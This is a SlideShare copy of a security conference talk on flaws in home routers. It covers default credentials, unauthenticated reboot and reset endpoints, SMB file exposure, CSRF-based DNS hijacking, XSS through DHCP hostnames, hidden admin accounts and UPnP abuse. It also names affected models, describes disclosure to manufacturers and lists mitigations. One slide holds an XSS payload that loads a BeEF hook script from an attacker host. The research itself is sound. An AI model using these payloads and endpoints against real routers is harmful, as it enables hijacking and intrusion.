SlideShare a Scribd company logo
Destroying Router Security - NNC5ed
About us...
Destroying Router Security · NNC5ed2
Meet our research group
Álvaro Folgado
Rueda
Independent Researcher
José Antonio
Rodríguez García
Independent Researcher
Iván Sanz de Castro
Security Analyst at
Wise Security Global.
Main goals
Destroying Router Security · NNC5ed3
Search for
vulnerability issues
Explore innovative
attack vectors
Develop exploiting
tools
Build an audit
methodology
Evaluate the
current security
level of routers
State of the art
• Previous researches
Destroying Router Security · NNC5ed4
State of the art
• Previous researches
Destroying Router Security · NNC5ed4
State of the art
• Previous researches
Destroying Router Security · NNC5ed4
State of the art
• Previous researches
Destroying Router Security · NNC5ed4
State of the art
• Previous researches
Destroying Router Security · NNC5ed4
State of the art
• Previous researches
Destroying Router Security · NNC5ed4
State of the art
• Real world attacks - Example 1
Destroying Router Security · NNC5ed5
State of the art
• Real world attacks - Example 2
Destroying Router Security · NNC5ed6
Common security problems
• Services
• Too many. Mostly useless.
• Increases attack surfaces
• Insecure
Destroying Router Security · NNC5ed7
Common security problems
• Default credentials
• Public and well-known for each model
• Non randomly generated
Destroying Router Security · NNC5ed8
45%
27%
5%
5%
18%
User / Password
1234 / 1234
admin / admin
[blank] / admin
admin / password
vodafone / vodafone
Common security problems
• Default credentials
• Hardly ever modified by users
Destroying Router Security · NNC5ed9
“I don't remember what the password is. I have never
changed it.”
* Gives you a post-it with the Wi-Fi password *
“Administrative password of... WHAT?”
“Oh!, so we have one of those (routers)?”
Users' response when asked about router passwords
Best-case
scenario
Worst-case
scenario
Common security problems
• Multiple user accounts
• Also with public default credentials
• Mostly useless for users
• Almost always hidden for end-users
• Passwords for these accounts are never changed
Destroying Router Security · NNC5ed10
Common security problems
• Multiple user accounts
• Also with public default credentials
• Mostly useless for users
• Almost always hidden for end-users
• Passwords for these accounts are never changed
Destroying Router Security · NNC5ed10
Bypass Authentication
• Allows unauthenticated attackers to carry out
router configuration changes
• Locally and remotely
• Exploits:
• Improper file permissions
• Service misconfiguration
Destroying Router Security · NNC5ed11
Bypass Authentication
• Web configuration interface
• Permanent Denial of Service
• By accessing /rebootinfo.cgi
• Reset to default configuration settings
• By accessing /restoreinfo.cgi
• Router replies with either HTTP 400 (Bad
Request) or HTTP 401 (Unauthorized)
• But spamming gets the job done!
Destroying Router Security · NNC5ed12
Video Demo #1
• Persistent DoS / Restore router to default
settings without requiring authentication
Bypass Authentication
• SMB
• Allows unauthenticated attackers to download
the entire router filesystem
• Including critical files such as /etc/passwd
• File modification is as well possible
• Erroneous configuration of the wide links
feature
Destroying Router Security · NNC5ed13
Bypass Authentication
• SMB
• Allows unauthenticated attackers to download
the entire router filesystem
• Including critical files such as /etc/passwd
• File modification is as well possible
• Erroneous configuration of the wide links
feature
Destroying Router Security · NNC5ed13
Bypass Authentication
• Twonky Media Server
• Allows unauthenticated attackers to manipulate
the contents of the USB storage device hooked
up to the router
• Download / Modify / Delete / Upload files.
• Misconfiguration of the service
Destroying Router Security · NNC5ed14
Bypass Authentication
• Twonky Media Server
• Allows unauthenticated attackers to manipulate
the contents of the USB storage device hooked
up to the router
• Download / Modify / Delete / Upload files.
• Misconfiguration of the service
Destroying Router Security · NNC5ed14
Cross Site Request Forgery
• Change any router configuration settings by
sending a specific malicious link to the victim
• Main goal
• DNS Hijacking
• Requires embedding login credentials in the
malicious URL
• Attack feasible if credentials have never been changed
• Google Chrome does not pop-up warning message
Destroying Router Security · NNC5ed15
Cross Site Request Forgery
• Change any router configuration settings by
sending a specific malicious link to the victim
• Main goal
• DNS Hijacking
• Requires embedding login credentials in the
malicious URL
• Attack feasible if credentials have never been changed
• Google Chrome does not pop-up warning message
Destroying Router Security · NNC5ed15
Cross Site Request Forgery
• Change any router configuration settings by
sending a specific malicious link to the victim
• Main goal
• DNS Hijacking
• Requires embedding login credentials in the
malicious URL
• Attack feasible if credentials have never been changed
• Google Chrome does not pop-up warning message
Destroying Router Security · NNC5ed15
Cross Site Request Forgery
• Change any router configuration settings by
sending a specific malicious link to the victim
• Main goal
• DNS Hijacking
• Requires embedding login credentials in the
malicious URL
• Attack feasible if credentials have never been changed
• Google Chrome does not pop-up warning message
Destroying Router Security · NNC5ed15
Cross Site Request Forgery
• Suspicious link, isn't it?
• URL Shortening Services
• Create a malicious website
Destroying Router Security · NNC5ed16
Persistent Cross Site Scripting
• Inject malicious script code within the web
configuration interface
• Goals
• Session Hijacking
• Browser Infection
Destroying Router Security · NNC5ed17
Persistent Cross Site Scripting
• Inject malicious script code within the web
configuration interface
• Goals
• Session Hijacking
• Browser Infection
Destroying Router Security · NNC5ed17
Persistent Cross Site Scripting
• Browser Exploitation Framework is a great help
• Input field character length limitation
• BeEF hooks link to a more complex script file hosted by
the attacker
http://1234:1234@192.168.1.1/goform?param=<script
src="http://NoIPDomain:3000/hook.js"></script>
Destroying Router Security · NNC5ed18
Persistent Cross Site Scripting
• Browser Exploitation Framework is a great help
• Input field character length limitation
• BeEF hooks link to a more complex script file hosted by
the attacker
http://1234:1234@192.168.1.1/goform?param=<script
src="http://NoIPDomain:3000/hook.js"></script>
Destroying Router Security · NNC5ed18
Unauthenticated Cross Site Scripting
• Script code injection is performed locally without
requiring any login process
• Send a DHCP Request PDU containing the malicious
script within the hostname parameter
• The malicious script is injected within Connected
Clients (DHCP Leases) table
Destroying Router Security · NNC5ed19
Unauthenticated Cross Site Scripting
Destroying Router Security · NNC5ed20
Unauthenticated Cross Site Scripting
Destroying Router Security · NNC5ed20
Unauthenticated Cross Site Scripting
• Sometimes it is a little bit harder...
Destroying Router Security · NNC5ed21
Unauthenticated Cross Site Scripting
• Sometimes it is a little bit harder...
Destroying Router Security · NNC5ed21
Unauthenticated Cross Site Scripting
• Or even next level...
• But it works!
Destroying Router Security · NNC5ed22
Privilege Escalation
• User without administrator rights is able to escalate
privileges and become an administrator
• Shows why multiple user accounts are unsafe
Destroying Router Security · NNC5ed23
Video Demo #2
• Privilege Escalation via FTP
Backdoor
• Hidden administrator accounts
• Completely invisible to end users
• But allows attackers to change any configuration setting
Destroying Router Security · NNC5ed24
Backdoor
• Hidden administrator accounts
• Completely invisible to end users
• But allows attackers to change any configuration setting
Destroying Router Security · NNC5ed24
Information Disclosure
• Obtain critical information without requiring any
login process
• WLAN password
• Detailed list of currently connected clients
• Hints about router's administrative password
• Other critical configuration settings
Destroying Router Security · NNC5ed25
Information Disclosure
• Obtain critical information without requiring any
login process
• WLAN password
• Detailed list of currently connected clients
• Hints about router's administrative password
• Other critical configuration settings
Destroying Router Security · NNC5ed25
Information Disclosure
Destroying Router Security · NNC5ed26
Information Disclosure
Destroying Router Security · NNC5ed26
Information Disclosure
Destroying Router Security · NNC5ed26
Universal Plug and Play
• Enabled by default on several router models
• Allows application to execute network
configuration changes such as opening ports
• Extremely insecure protocol
• Lack of an authentication process
• Awful implementations
• Goals
• Open critical ports for remote WAN hosts
• Persistent Denial of Service
• Carry out other configuration changes
Destroying Router Security · NNC5ed27
Universal Plug and Play
• Locally
• Miranda UPnP tool
Destroying Router Security · NNC5ed28
Universal Plug and Play
• Locally
• Miranda UPnP tool
Destroying Router Security · NNC5ed28
Universal Plug and Play
• Locally
• Miranda UPnP tool
Destroying Router Security · NNC5ed28
Universal Plug and Play
Destroying Router Security · NNC5ed29
Universal Plug and Play
Destroying Router Security · NNC5ed29
Universal Plug and Play
Destroying Router Security · NNC5ed29
Universal Plug and Play
Destroying Router Security · NNC5ed29
Universal Plug and Play
• Remotely
• Malicious SWF file
Destroying Router Security · NNC5ed30
Attack vectors
• Locally
• Attacker is connected to the victim's LAN either using an
Ethernet cable or wirelessly
• Remotely
• The attacker is outside of the victim's LAN
Destroying Router Security · NNC5ed31
Social Engineering is your friend
• For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Destroying Router Security · NNC5ed32
Social Engineering is your friend
• For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Destroying Router Security · NNC5ed32
Social Engineering is your friend
• For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Destroying Router Security · NNC5ed32
Social Engineering is your friend
• For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Destroying Router Security · NNC5ed32
Destroying Router Security · NNC5ed33
Live Demo #1
• DNS Hijacking via CSRF
Live Demo #2
• Bypass Authentication using SMB Symlinks
• Unauthenticated Cross Site Scripting via DHCP Request
Live Demo #3
Developed tools
Destroying Router Security · NNC5ed34
Developed tools
Destroying Router Security · NNC5ed35
7
3
1
No reply
"Not our problem"
Other
Manufacturers' response
• Average 2-3 emails sent to each manufacturer
• Most of them unreplied... 6 months later
• Number of vulnerabilities fixed: 0
Destroying Router Security · NNC5ed36
Manufacturers' response
• Average 2-3 emails sent to each manufacturer
• Most of them unreplied... 6 months later
• Number of vulnerabilities fixed: 0
Destroying Router Security · NNC5ed36
Mitigations
• For end users
• Change your router's administrative password
• Try to delete any other administrative account
• At least, change their passwords
• Update the firmware...
• ... after spamming your manufacturer to fix the
vulnerabilities
• Do not trust shortened links
• Disable UPnP. It's evil
• Disable any other unused services
Destroying Router Security · NNC5ed37
Mitigations
• For manufacturers
• Listen to what security researchers have to say
• Do not include useless services
• Specially for ISP SOHO routers
• At least, make it feasible to completely shut them down
• Critical ports closed to WAN by default
• At least: 21, 22, 23, 80 and 8000/8080
• Randomly generate user credentials
• Do not include multiple user accounts
• Avoid using unsafe protocols (HTTP, telnet and FTP)
• Design a safer alternative to UPnP
Destroying Router Security · NNC5ed38
Mitigations
• For manufacturers
• XSS
• Check every input field within router's web interface
• Sanitize DHCP hostname parameters
• Content Security Policies
• CSRF
• Tokens... that work
• Bypass Authentication & Information Disclosure
• Check for improper file permissions and public debug messages
• Service-related
• Check for possible wrong service configuration (e.g.: FTP, SMB)
Destroying Router Security · NNC5ed39
Mitigations
• For manufacturers
• XSS
• Check every input field within router's web interface
• Sanitize DHCP hostname parameters
• Content Security Policies
• CSRF
• Tokens... that work
• Bypass Authentication & Information Disclosure
• Check for improper file permissions and public debug messages
• Service-related
• Check for possible wrong service configuration (e.g.: FTP, SMB)
Destroying Router Security · NNC5ed39
Results
• More than 60 vulnerabilities have been discovered
• 22 router models affected
• 11 manufacturers affected
Destroying Router Security · NNC5ed40
Destroying Router Security · NNC5ed41
0
2
4
6
8
10
12
14
16
18
Disclosed vulnerabilities per manufacturer
Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers
Destroying Router Security · NNC5ed42
21%
15%
20%
8%
2%
3%
2%
6%
23% XSS
Unauthenticated XSS
CSRF
Denial of Service
Privilege Escalation
Information Disclosure
Backdoor
Bypass Authentication
UPnP
Vulnerabilities
by types
Destroying Router Security · NNC5ed43
Router XSS
Unauth.
XSS
CSRF DoS
Privilege
Escalation
Info.
Disclosure
Backdoor
Bypass
Auth.
UPnP
Observa Telecom AW4062 Vuln. - Vuln. Vuln. Vuln. - - - -
Comtrend WAP-5813n Vuln. - Vuln. - - - - - Vuln.
Comtrend CT-5365 Vuln. Vuln. Vuln. - - - - - Vuln.
D-Link DSL2750B - - - - - Vuln. - - Vuln.
Belkin F5D7632-4 - - Vuln. Vuln. - - - - Vuln.
Sagem LiveBox Pro 2 SP Vuln. - - - - - - - Vuln.
Amper Xavi 7968/+ - Vuln. - - - - - - Vuln.
Sagem F@st 1201 - Vuln. - - - - - - -
Linksys WRT54GL - Vuln. - - - - - - -
Observa Telecom RTA01N Vuln. Vuln. Vuln. Vuln. - - Vuln. - Vuln.
Observa Telecom BHS-RTA - - - - - Vuln. - - Vuln.
Observa Telecom VH4032N Vuln. - Vuln. - - - - Vuln. Vuln.
Huawei HG553 Vuln. - Vuln. Vuln. - - - Vuln. Vuln.
Huawei HG556a Vuln. Vuln. Vuln. Vuln. - - - Vuln. Vuln.
Astoria ARV7510 - - Vuln. - - - - Vuln. -
Amper ASL-26555 Vuln. Vuln. Vuln. - - - - Vuln.
Comtrend AR-5387un Vuln. Vuln. - - - - - - -
Netgear CG3100D Vuln. - Vuln. - - - - - -
Comtrend VG-8050 Vuln. Vuln. - - - - - - -
Zyxel P 660HW-B1A Vuln. - Vuln. - - - - - -
Comtrend 536+ - - - - - - - - Vuln.
D-Link DIR-600 - - - - - - - - Vuln.
Responsible Disclosure
Destroying Router Security · NNC5ed44
Responsible Disclosure
Destroying Router Security · NNC5ed44
Responsible Disclosure
Destroying Router Security · NNC5ed44
Responsible Disclosure
Destroying Router Security · NNC5ed44
Responsible Disclosure
Destroying Router Security · NNC5ed44
Responsible Disclosure
Destroying Router Security · NNC5ed44
Conclusion
• Has SOHO router security
improved?
• Hell NO!
• Serious security problems
• Easy to exploit
• With huge impact
• Millions of users affected
• PLEASE, START FIXING
SOHO ROUTER SECURITY
• NOW!
Destroying Router Security · NNC5ed45
TL;DR
Destroying Router Security · NNC5ed46
TL;DR
Destroying Router Security · NNC5ed46
Álvaro Folgado Rueda · alvfolrue@gmail.com
José A. Rodríguez García · joseantorodriguezg@gmail.com
Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com
Destroying Router Security · NNC5ed47
Thank you!
Q&A Time

More Related Content

PPTX
Cisco router modes
DOCX
How to configure a router
PPTX
Router and routing
PPT
Modes of router
PPTX
Routers and Routing Configuration
DOCX
Cisco router configuration tutorial
PPTX
8. internal components of router
PPT
Router configuration
Cisco router modes
How to configure a router
Router and routing
Modes of router
Routers and Routing Configuration
Cisco router configuration tutorial
8. internal components of router
Router configuration

What's hot (20)

PPTX
Router configuration
PPT
Ccna day2
PPTX
Ccna PPT2
PDF
Cisco Router Basic Configuration
PPTX
Router configuration in packet tracer
PDF
Day 1 INTRODUCTION TO IOS AND CISCO ROUTERS
PPT
Router configuration
PPT
Day 5.3 configuration of router
PPTX
CCNA ppt Day 4
PPT
Initial Configuration of Router
PPTX
Cisco router basic
PDF
Chandan singh seminar report pdf.......router
PPTX
Introduction to router
PDF
Basic Configurations on Router
PPTX
Setting Up a Windows Network
PPTX
Лекц 9
PPT
Exploration Lan Switching Chapter2
PDF
Uccn1003 -may10_-_lect04a_-_intro_to_routing_rules
PPT
Introduction to routers
PPTX
Router configuration
Ccna day2
Ccna PPT2
Cisco Router Basic Configuration
Router configuration in packet tracer
Day 1 INTRODUCTION TO IOS AND CISCO ROUTERS
Router configuration
Day 5.3 configuration of router
CCNA ppt Day 4
Initial Configuration of Router
Cisco router basic
Chandan singh seminar report pdf.......router
Introduction to router
Basic Configurations on Router
Setting Up a Windows Network
Лекц 9
Exploration Lan Switching Chapter2
Uccn1003 -may10_-_lect04a_-_intro_to_routing_rules
Introduction to routers
Ad

Viewers also liked (18)

PPTX
Concepts of Data Bases
DOCX
Guia unidad i ejercicios
PDF
DOCX
Nitin_CV
DOCX
QA Resume
DOCX
QA resume
DOCX
QA Experience Resume
DOCX
vikram cisco voice new resume
DOCX
Rick Hart Resume - IT Mgr & Cisco VOIP
PPTX
Top 8 software qa engineer resume samples
PPT
Cisco Router Security
PPTX
Securing the LAN Best practices to secure the wired access network
PDF
QA Interview Questions With Answers
PDF
Interview questions and answers for quality assurance
PDF
132 qa interview questions and answers pdf
PPT
Presentation on router
PPT
Wireless routers Presentation
PPTX
Routers.ppt
Concepts of Data Bases
Guia unidad i ejercicios
Nitin_CV
QA Resume
QA resume
QA Experience Resume
vikram cisco voice new resume
Rick Hart Resume - IT Mgr & Cisco VOIP
Top 8 software qa engineer resume samples
Cisco Router Security
Securing the LAN Best practices to secure the wired access network
QA Interview Questions With Answers
Interview questions and answers for quality assurance
132 qa interview questions and answers pdf
Presentation on router
Wireless routers Presentation
Routers.ppt
Ad

Similar to Destroying Router Security - NNC5ed (20)

PPTX
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
PDF
Attack all the layers secure 360
PPTX
Soho routers: swords and shields CyberCamp 2015
PPTX
You think your WiFi is safe?
PPTX
Between you me and the network security boundary
PDF
Xfocus xcon 2008_aks_oknock
PPS
Aditya - Hacking Client Side Insecurities - ClubHack2008
PPTX
Using hypervisor and container technology to increase datacenter security pos...
PPTX
Using hypervisor and container technology to increase datacenter security pos...
PDF
Halo Installfest Slides
PDF
Design patterns for microservice architecture
PPTX
Cloud native Continuous Delivery
PDF
idsecconf2010-hacking priv8 network
PDF
y3dips hacking priv8 network
PPTX
Cisco umbrella youtube
PPTX
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
PDF
CWNP The Evolution Of Guest Access
PDF
Private cloud networking_cloudstack_days_austin
PPTX
Cloud native Continuous Delivery
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
Attack all the layers secure 360
Soho routers: swords and shields CyberCamp 2015
You think your WiFi is safe?
Between you me and the network security boundary
Xfocus xcon 2008_aks_oknock
Aditya - Hacking Client Side Insecurities - ClubHack2008
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
Halo Installfest Slides
Design patterns for microservice architecture
Cloud native Continuous Delivery
idsecconf2010-hacking priv8 network
y3dips hacking priv8 network
Cisco umbrella youtube
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CWNP The Evolution Of Guest Access
Private cloud networking_cloudstack_days_austin
Cloud native Continuous Delivery

Recently uploaded (20)

PDF
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PPTX
Chapter 5: Probability Theory and Statistics
PDF
Assigned Numbers - 2025 - Bluetooth® Document
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
PDF
A novel scalable deep ensemble learning framework for big data classification...
PDF
Hybrid model detection and classification of lung cancer
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
PDF
Getting Started with Data Integration: FME Form 101
PPTX
Tartificialntelligence_presentation.pptx
PDF
project resource management chapter-09.pdf
PPTX
cloud_computing_Infrastucture_as_cloud_p
PPTX
OMC Textile Division Presentation 2021.pptx
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PPTX
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
PPTX
Programs and apps: productivity, graphics, security and other tools
PPTX
TLE Review Electricity (Electricity).pptx
PDF
Web App vs Mobile App What Should You Build First.pdf
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
Chapter 5: Probability Theory and Statistics
Assigned Numbers - 2025 - Bluetooth® Document
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
A novel scalable deep ensemble learning framework for big data classification...
Hybrid model detection and classification of lung cancer
Accuracy of neural networks in brain wave diagnosis of schizophrenia
SOPHOS-XG Firewall Administrator PPT.pptx
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Getting Started with Data Integration: FME Form 101
Tartificialntelligence_presentation.pptx
project resource management chapter-09.pdf
cloud_computing_Infrastucture_as_cloud_p
OMC Textile Division Presentation 2021.pptx
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Programs and apps: productivity, graphics, security and other tools
TLE Review Electricity (Electricity).pptx
Web App vs Mobile App What Should You Build First.pdf

Destroying Router Security - NNC5ed

  • 2. About us... Destroying Router Security · NNC5ed2 Meet our research group Álvaro Folgado Rueda Independent Researcher José Antonio Rodríguez García Independent Researcher Iván Sanz de Castro Security Analyst at Wise Security Global.
  • 3. Main goals Destroying Router Security · NNC5ed3 Search for vulnerability issues Explore innovative attack vectors Develop exploiting tools Build an audit methodology Evaluate the current security level of routers
  • 4. State of the art • Previous researches Destroying Router Security · NNC5ed4
  • 5. State of the art • Previous researches Destroying Router Security · NNC5ed4
  • 6. State of the art • Previous researches Destroying Router Security · NNC5ed4
  • 7. State of the art • Previous researches Destroying Router Security · NNC5ed4
  • 8. State of the art • Previous researches Destroying Router Security · NNC5ed4
  • 9. State of the art • Previous researches Destroying Router Security · NNC5ed4
  • 10. State of the art • Real world attacks - Example 1 Destroying Router Security · NNC5ed5
  • 11. State of the art • Real world attacks - Example 2 Destroying Router Security · NNC5ed6
  • 12. Common security problems • Services • Too many. Mostly useless. • Increases attack surfaces • Insecure Destroying Router Security · NNC5ed7
  • 13. Common security problems • Default credentials • Public and well-known for each model • Non randomly generated Destroying Router Security · NNC5ed8 45% 27% 5% 5% 18% User / Password 1234 / 1234 admin / admin [blank] / admin admin / password vodafone / vodafone
  • 14. Common security problems • Default credentials • Hardly ever modified by users Destroying Router Security · NNC5ed9 “I don't remember what the password is. I have never changed it.” * Gives you a post-it with the Wi-Fi password * “Administrative password of... WHAT?” “Oh!, so we have one of those (routers)?” Users' response when asked about router passwords Best-case scenario Worst-case scenario
  • 15. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Destroying Router Security · NNC5ed10
  • 16. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Destroying Router Security · NNC5ed10
  • 17. Bypass Authentication • Allows unauthenticated attackers to carry out router configuration changes • Locally and remotely • Exploits: • Improper file permissions • Service misconfiguration Destroying Router Security · NNC5ed11
  • 18. Bypass Authentication • Web configuration interface • Permanent Denial of Service • By accessing /rebootinfo.cgi • Reset to default configuration settings • By accessing /restoreinfo.cgi • Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized) • But spamming gets the job done! Destroying Router Security · NNC5ed12 Video Demo #1 • Persistent DoS / Restore router to default settings without requiring authentication
  • 19. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Destroying Router Security · NNC5ed13
  • 20. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Destroying Router Security · NNC5ed13
  • 21. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Destroying Router Security · NNC5ed14
  • 22. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Destroying Router Security · NNC5ed14
  • 23. Cross Site Request Forgery • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Destroying Router Security · NNC5ed15
  • 24. Cross Site Request Forgery • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Destroying Router Security · NNC5ed15
  • 25. Cross Site Request Forgery • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Destroying Router Security · NNC5ed15
  • 26. Cross Site Request Forgery • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Destroying Router Security · NNC5ed15
  • 27. Cross Site Request Forgery • Suspicious link, isn't it? • URL Shortening Services • Create a malicious website Destroying Router Security · NNC5ed16
  • 28. Persistent Cross Site Scripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Destroying Router Security · NNC5ed17
  • 29. Persistent Cross Site Scripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Destroying Router Security · NNC5ed17
  • 30. Persistent Cross Site Scripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Destroying Router Security · NNC5ed18
  • 31. Persistent Cross Site Scripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Destroying Router Security · NNC5ed18
  • 32. Unauthenticated Cross Site Scripting • Script code injection is performed locally without requiring any login process • Send a DHCP Request PDU containing the malicious script within the hostname parameter • The malicious script is injected within Connected Clients (DHCP Leases) table Destroying Router Security · NNC5ed19
  • 33. Unauthenticated Cross Site Scripting Destroying Router Security · NNC5ed20
  • 34. Unauthenticated Cross Site Scripting Destroying Router Security · NNC5ed20
  • 35. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Destroying Router Security · NNC5ed21
  • 36. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Destroying Router Security · NNC5ed21
  • 37. Unauthenticated Cross Site Scripting • Or even next level... • But it works! Destroying Router Security · NNC5ed22
  • 38. Privilege Escalation • User without administrator rights is able to escalate privileges and become an administrator • Shows why multiple user accounts are unsafe Destroying Router Security · NNC5ed23 Video Demo #2 • Privilege Escalation via FTP
  • 39. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Destroying Router Security · NNC5ed24
  • 40. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Destroying Router Security · NNC5ed24
  • 41. Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Destroying Router Security · NNC5ed25
  • 42. Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Destroying Router Security · NNC5ed25
  • 46. Universal Plug and Play • Enabled by default on several router models • Allows application to execute network configuration changes such as opening ports • Extremely insecure protocol • Lack of an authentication process • Awful implementations • Goals • Open critical ports for remote WAN hosts • Persistent Denial of Service • Carry out other configuration changes Destroying Router Security · NNC5ed27
  • 47. Universal Plug and Play • Locally • Miranda UPnP tool Destroying Router Security · NNC5ed28
  • 48. Universal Plug and Play • Locally • Miranda UPnP tool Destroying Router Security · NNC5ed28
  • 49. Universal Plug and Play • Locally • Miranda UPnP tool Destroying Router Security · NNC5ed28
  • 50. Universal Plug and Play Destroying Router Security · NNC5ed29
  • 51. Universal Plug and Play Destroying Router Security · NNC5ed29
  • 52. Universal Plug and Play Destroying Router Security · NNC5ed29
  • 53. Universal Plug and Play Destroying Router Security · NNC5ed29
  • 54. Universal Plug and Play • Remotely • Malicious SWF file Destroying Router Security · NNC5ed30
  • 55. Attack vectors • Locally • Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly • Remotely • The attacker is outside of the victim's LAN Destroying Router Security · NNC5ed31
  • 56. Social Engineering is your friend • For link-based remote attacks • XSS, CSRF and UPnP • Social Networks = Build the easiest botnet ever! • Phishing emails = Targeted attacks Destroying Router Security · NNC5ed32
  • 57. Social Engineering is your friend • For link-based remote attacks • XSS, CSRF and UPnP • Social Networks = Build the easiest botnet ever! • Phishing emails = Targeted attacks Destroying Router Security · NNC5ed32
  • 58. Social Engineering is your friend • For link-based remote attacks • XSS, CSRF and UPnP • Social Networks = Build the easiest botnet ever! • Phishing emails = Targeted attacks Destroying Router Security · NNC5ed32
  • 59. Social Engineering is your friend • For link-based remote attacks • XSS, CSRF and UPnP • Social Networks = Build the easiest botnet ever! • Phishing emails = Targeted attacks Destroying Router Security · NNC5ed32
  • 60. Destroying Router Security · NNC5ed33 Live Demo #1 • DNS Hijacking via CSRF Live Demo #2 • Bypass Authentication using SMB Symlinks • Unauthenticated Cross Site Scripting via DHCP Request Live Demo #3
  • 61. Developed tools Destroying Router Security · NNC5ed34
  • 62. Developed tools Destroying Router Security · NNC5ed35
  • 63. 7 3 1 No reply "Not our problem" Other Manufacturers' response • Average 2-3 emails sent to each manufacturer • Most of them unreplied... 6 months later • Number of vulnerabilities fixed: 0 Destroying Router Security · NNC5ed36
  • 64. Manufacturers' response • Average 2-3 emails sent to each manufacturer • Most of them unreplied... 6 months later • Number of vulnerabilities fixed: 0 Destroying Router Security · NNC5ed36
  • 65. Mitigations • For end users • Change your router's administrative password • Try to delete any other administrative account • At least, change their passwords • Update the firmware... • ... after spamming your manufacturer to fix the vulnerabilities • Do not trust shortened links • Disable UPnP. It's evil • Disable any other unused services Destroying Router Security · NNC5ed37
  • 66. Mitigations • For manufacturers • Listen to what security researchers have to say • Do not include useless services • Specially for ISP SOHO routers • At least, make it feasible to completely shut them down • Critical ports closed to WAN by default • At least: 21, 22, 23, 80 and 8000/8080 • Randomly generate user credentials • Do not include multiple user accounts • Avoid using unsafe protocols (HTTP, telnet and FTP) • Design a safer alternative to UPnP Destroying Router Security · NNC5ed38
  • 67. Mitigations • For manufacturers • XSS • Check every input field within router's web interface • Sanitize DHCP hostname parameters • Content Security Policies • CSRF • Tokens... that work • Bypass Authentication & Information Disclosure • Check for improper file permissions and public debug messages • Service-related • Check for possible wrong service configuration (e.g.: FTP, SMB) Destroying Router Security · NNC5ed39
  • 68. Mitigations • For manufacturers • XSS • Check every input field within router's web interface • Sanitize DHCP hostname parameters • Content Security Policies • CSRF • Tokens... that work • Bypass Authentication & Information Disclosure • Check for improper file permissions and public debug messages • Service-related • Check for possible wrong service configuration (e.g.: FTP, SMB) Destroying Router Security · NNC5ed39
